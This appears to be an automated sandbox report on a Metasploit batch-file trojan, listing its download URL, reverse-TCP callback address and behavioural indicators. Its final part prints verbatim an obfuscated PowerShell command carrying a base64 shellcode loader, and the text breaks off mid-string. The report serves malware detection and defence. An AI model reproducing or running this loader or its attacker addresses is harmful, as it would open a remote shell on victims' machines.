metasploit | hxxp://147[.]185[.]221[.]19[:]30007/cracked[.]bat

Analysis

max time kernel
328s
max time network
317s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
09-05-2024 20:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://147.185.221.19:30007/cracked.bat

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

147.185.221.19:48103

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

35 4384 powershell.exe
58 6012 powershell.exe
70 5836 powershell.exe
71 5076 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

cracked.exe

pid process

856 cracked.exe

flow	pid	process
35	4384	powershell.exe
58	6012	powershell.exe
70	5836	powershell.exe
71	5076	powershell.exe

pid	process
856	cracked.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133597596372497058"	chrome.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

Processes:

chrome.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exe

pid	process
4548	chrome.exe
4548	chrome.exe
4992	powershell.exe
4992	powershell.exe
4992	powershell.exe
2308	powershell.exe
2308	powershell.exe
2308	powershell.exe
4384	powershell.exe
4384	powershell.exe
4384	powershell.exe
5772	powershell.exe
5772	powershell.exe
5772	powershell.exe
5892	powershell.exe
5892	powershell.exe
5892	powershell.exe
6012	powershell.exe
6012	powershell.exe
6012	powershell.exe
1304	powershell.exe
1304	powershell.exe
1304	powershell.exe
4356	powershell.exe
4356	powershell.exe
4356	powershell.exe
5076	powershell.exe
5076	powershell.exe
5076	powershell.exe
3836	powershell.exe
3836	powershell.exe
3836	powershell.exe
2688	powershell.exe
2688	powershell.exe
2688	powershell.exe
5836	powershell.exe
5836	powershell.exe
5836	powershell.exe
3176	chrome.exe
3176	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

Processes:

chrome.exe

pid process

4548 chrome.exe
4548 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeDebugPrivilege	4384	powershell.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe
Token: SeCreatePagefilePrivilege	4548	chrome.exe
Token: SeShutdownPrivilege	4548	chrome.exe

Suspicious use of FindShellTrayWindow 41 IoCs

Processes:

chrome.exe

pid	process
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4548 wrote to memory of 3328	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3328	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 1264	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3308	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3308	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe
PID 4548 wrote to memory of 3500	4548	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://147.185.221.19:30007/cracked.bat
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffceff1ab58,0x7ffceff1ab68,0x7ffceff1ab78
2⤵
PID:3328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1688 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:2
2⤵
PID:1264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:8
2⤵
PID:3308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2204 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:8
2⤵
PID:3500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2912 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:1
2⤵
PID:2380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2916 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:1
2⤵
PID:924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:8
2⤵
PID:3848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4828 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:8
2⤵
PID:4700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4208 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:8
2⤵
PID:3336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\cracked.bat" "
2⤵
PID:2044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -C "sv N -;sv xBk ec;sv S ((gv N).value.toString()+(gv xBk).value.toString());powershell (gv S).value.toString() 'JABaAGoATwBJACAAPQAgACcAJABvAHoAVAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAHoAVAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGYALAAwAHgAZQBmACwAMAB4ADgAMwAsADAAeAA2ADMALAAwAHgANwA0ACwAMAB4AGQAZAAsADAAeABjADIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAOAAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADkANwAsADAAeAA4AGQALAAwAHgAOAAxACwAMAB4ADgAMQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGMAYQAsADAAeAA2AGEALAAwAHgANgAzACwAMAB4ADcAYgAsADAAeABiADUALAAwAHgAZQAzACwAMAB4ADgANgAsADAAeAA0AGEALAAwAHgAZQA3ACwAMAB4ADkAMAAsADAAeABjADMALAAwAHgAZgBmACwAMAB4ADMANwAsADAAeABkADIALAAwAHgAOAAxACwAMAB4AGYAMwAsADAAeABiAGMALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeAAzAGQALAAwAHgAMwBjACwAMAB4ADMAOQAsADAAeAA4AGUALAAwAHgANwA3ACwAMAB4AGUANAAsADAAeABjAGQALAAwAHgAOAAyACwAMAB4AGEAZgAsADAAeABkADkALAAwAHgAMQAxACwAMAB4AGMAZQAsADAAeAA4AGMALAAwAHgANwA4ACwAMAB4AGUAZQAsADAAeAAwAGMALAAwAHgAYwAxACwAMAB4ADUAYQAsADAAeABjAGYALAAwAHgAZABmACwAMAB4ADEANAAsADAAeAA5AGEALAAwAHgAMAA4ACwAMAB4ADkANgAsADAAeAA1ADMALAAwAHgANwAzACwAMAB4AGMANAAsADAAeAA3AGYALAAwAHgAMQA3ACwAMAB4AGQAOQAsADAAeABmADkALAAwAHgAZgA0ACwAMAB4ADYANQAsADAAeABlADIALAAwAHgAZgA4ACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgANQBhACwAMAB4ADgAMwAsADAAeAA1AGYALAAwAHgAMwA1ACwAMAB4ADIAZQAsADAAeAAzAGYALAAwAHgANQBlACwAMAB4ADYANgAsADAAeAA0ADQALAAwAHgAZQA3ACwAMAB4ADQAMAAsADAAeAAwAGQALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABkADAALAAwAHgAMQAwACwAMAB4ADcANwAsADAAeABiADUALAAwAHgAMQA5ACwAMAB4ADYANgAsADAAeAA0AGIALAAwAHgAZgBmACwAMAB4ADEAMgAsADAAeABiADMALAAwAHgAMwA4ACwAMAB4AGYAZQAsADAAeABmADIALAAwAHgAOABkACwAMAB4AGMAMQAsADAAeAAzADAALAAwAHgAMwBhACwAMAB4ADIAYwAsADAAeABmADIALAAwAHgAMwBlACwAMAB4ADEANgAsADAAeABhAGUALAAwAHgAYwBhACwAMAB4ADcAOQAsADAAeAA4ADYALAAwAHgAYwA0ACwAMAB4ADIAMAAsADAAeAA3AGEALAAwAHgAMwBiACwAMAB4AGQAZgAsADAAeABmADIALAAwAHgAMAAwACwAMAB4AGUANwAsADAAeAA2AGEALAAwAHgAZQA1ACwAMAB4AGEAMwAsADAAeAA2AGMALAAwAHgAYwBjACwAMAB4AGMAMQAsADAAeAA1ADIALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeAA4ADIALAAwAHgANQA5ACwAMAB4ADAAZQAsADAAeABkAGYALAAwAHgAYwBkACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAMABjACwAMAB4ADYANgAsADAAeAA3ADkALAAwAHgAMQBhACwAMAB4AGIAMwAsADAAeABhADkALAAwAHgAMABiACwAMAB4ADUAOAAsADAAeAA5ADAALAAwAHgANgBkACwAMAB4ADUANwAsADAAeAAzAGIALAAwAHgAYgA5ACwAMAB4ADMANAAsADAAeAAzAGQALAAwAHgAZQBhACwAMAB4AGMANgAsADAAeAAyADcALAAwAHgAOQA5ACwAMAB4ADUAMwAsADAAeAA2ADMALAAwAHgAMgAzACwAMAB4ADAAOAAsADAAeAA4ADIALAAwAHgAMQAzACwAMAB4AGMAYwAsADAAeABkADIALAAwAHgAYQBiACwAMAB4ADQAOQAsADAAeAA1AGIALAAwAHgAMQBlACwAMAB4ADYAMQAsADAAeAA3ADIALAAwAHgAOQBiACwAMAB4ADAAOAAsADAAeABmADIALAAwAHgAMAAxACwAMAB4AGEAOQAsADAAeAA5ADcALAAwAHgAYQA4ACwAMAB4ADgAZAAsADAAeAA4ADEALAAwAHgANQAwACwAMAB4ADcANgAsADAAeAA0ADkALAAwAHgAOQAzACwAMAB4ADcANwAsADAAeAA4ADkALAAwAHgAOAA1ACwAMAB4ADEAYgAsADAAeAAxADcALAAwAHgANwA0ACwAMAB4ADIANgAsADAAeAA1AGMALAAwAHgAMwAxACwAMAB4AGIAMgAsADAAeAA3ADIALAAwAHgAMABjACwAMAB4ADIAOQAsADAAeAAxADMALAAwAHgAZgBiACwAMAB4AGMANwAsADAAeABhADkALAAwAHgAOQBjACwAMAB4ADIAZQAsADAAeAA3AGQALAAwAHgAYQAwACwAMAB4ADAAYQAsADAAeAA0ADIALAAwAHgAMwBiACwAMAB4ADYAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADMAZQAsADAAeAA5ADIALAAwAHgANgA2ACwAMAB4ADIAYgAsADAAeABiADcALAAwAHgANwA0ACwAMAB4AGMAOAAsADAAeABlADQALAAwAHgAOQA4ACwAMAB4ADIAOAAsADAAeABhADgALAAwAHgANQA0ACwAMAB4ADUAOQAsADAAeAA5ADkALAAwAHgANAAwACwAMAB4AGIAZgAsADAAeAA1ADYALAAwAHgAYwA2ACwAMAB4ADcAMAAsADAAeABjADAALAAwAHgAYgBjACwAMAB4ADYAZgAsADAAeAAxAGEALAAwAHgAMgBmACwAMAB4ADYAOQAsADAAeABjADcALAAwAHgAYgAyACwAMAB4AGQANgAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMwAsADAAeAAxADYALAAwAHgAZQBmACwAMAB4AGQAOQAsADAAeAA2ADMALAAwAHgAOQBjACwAMAB4ADEAYwAsADAAeAAxAGQALAAwAHgAMgBkACwAMAB4ADUANQAsADAAeAA2ADgALAAwAHgAMABkACwAMAB4AGQAOQAsADAAeAA5ADUALAAwAHgAMgA3ACwAMAB4ADYAZgAsADAAeAA0AGYALAAwAHgAYQA5ACwAMAB4ADkAZAAsADAAeAAxAGEALAAwAHgANgBmACwAMAB4ADMAZgAsADAAeAAxAGEALAAwAHgAOABkACwAMAB4ADMAOAAsADAAeABkADcALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwAGUALAAwAHgANwA4ACwAMAB4AGQAYQAsADAAeABkAGYALAAwAHgAMAA1ACwAMAB4AGIAMQAsADAAeAA0AGUALAAwAHgAYQAwACwAMAB4ADcAMQAsADAAeABiAGUALAAwAHgAOQBlACwAMAB4ADIAMAAsADAAeAA4ADEALAAwAHgAZQA4ACwAMAB4AGYANAAsADAAeAAyADAALAAwAHgAZQA5ACwAMAB4ADQAYwAsADAAeABhAGQALAAwAHgANwAyACwAMAB4ADAAYwAsADAAeAA5ADMALAAwAHgANwA4ACwAMAB4AGUANwAsADAAeAA5AGQALAAwAHgAMAA2ACwAMAB4ADgAMwAsADAAeAA1AGUALAAwAHgANwAyACwAMAB4ADgAMAAsADAAeABlAGIALAAwAHgANQBjACwAMAB4AGEAZAAsADAAeABlADYALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA5ADgALAAwAHgAZgA2ACwAMAB4ADgAOAAsADAAeAA0ADkALAAwAHgAZQA0ACwAMAB4ADgAYwAsADAAeABlADAALAAwAHgANAA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABTAGUAbwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUwBlAG8ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFMAZQBvACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBqAE8ASQApACkAOwAkAFYAVQBiAG0AIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcQBiAFgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQBy